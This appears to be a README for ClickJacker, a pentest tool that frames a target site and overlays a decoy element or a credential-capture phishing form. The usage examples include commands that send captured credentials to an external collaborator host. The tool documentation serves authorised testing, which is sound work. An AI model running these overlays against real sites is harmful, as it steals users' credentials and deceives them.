What it does
ClickJacker frames a target URL in an iframe and places an attack element over the top. Two modes are available: a phishing overlay, which drops a credential-capture form and POSTs submitted entries to a collaborator address; and a decoy overlay, which places a draggable, resizable element on top of the framed site for classic clickjacking demonstrations. The phishing approach tends to produce the stronger finding in client reports, but the decoy mode covers cases where the impact of a frameability issue needs to be shown without a credential angle.
Whether a target is actually vulnerable still requires judgement on your part. Framebusting JavaScript and response headers can defeat framing in ways that are difficult to check automatically, so the tool puts the PoC on screen and leaves the assessment to you.
Decoy templates
The decoy overlay ships with four built-in templates: a fake button, a survey prompt, a security verification banner, and a flash reward. A fifth option takes arbitrary HTML, so you can tailor the element to the target without modifying the binary. All overlays are draggable and resizable from any edge or corner, with an opacity slider to adjust visibility. The chrome fades after ten seconds of inactivity and restores on interaction, which keeps the PoC screenshot clean.
The original Go version
The tool started as a Go project. The Go version used
net/http as the server, embedded the HTML template, CSS, and fonts with
//go:embed, and handled the client-side overlay logic in TypeScript compiled to a single JS bundle.
The CONTAINER=TRUE environment variable suppressed the automatic browser open for Docker use.
That version still lives in the
go/ directory of the repository if you need to reference it.
The Rust rewrite
The current version replaces Go with Rust throughout. The server is Axum, and the client-side overlay
logic is compiled to WASM via wasm-bindgen, replacing the TypeScript bundle. The core overlay
logic lives in clickjack-core, shared between the CLI and the WASM crate. The CLI is in
clickjack-cli, and clickjack-wasm exposes the DOM manipulation functions to the
browser.
A few specific changes from the Go version worth noting:
- Two attack modes. The Go version only had the phishing form overlay. The Rust version adds the decoy overlay with templates, drag/resize, and opacity control.
-
--no-openflag. Replaces theCONTAINER=TRUEenvironment variable for suppressing the automatic browser open. -
Configurable port.
--portdefaults to 9999 but can be overridden, which was not available in the Go version. - WASM instead of TypeScript. The client-side logic is compiled from the same Rust codebase as the server rather than maintained as a separate TypeScript project.
Usage
# frame a target and capture credentials to a collaborator address
clickjack https://app.acme.example https://x9k2.oastify.com
# custom port
clickjack --port 8888 https://app.acme.example
# optional logo in the nav bar
clickjack --logo ./logo.svg https://app.acme.example https://x9k2.oastify.com
# suppress automatic browser open (e.g. Docker, headless environments)
clickjack --no-open https://app.acme.example
Why it saves time on multi-application engagements
Clickjacking is a low-complexity finding but adds up on engagements with a large number of in-scope applications. Building a framing PoC for each host by hand means writing HTML, hosting it, and taking a screenshot, repeated across every application and every authenticated route you want to evidence. ClickJacker reduces that to a single command per host. The decoy overlay and phishing form are ready immediately; swap the target argument for the next host and the next screenshot follows in seconds.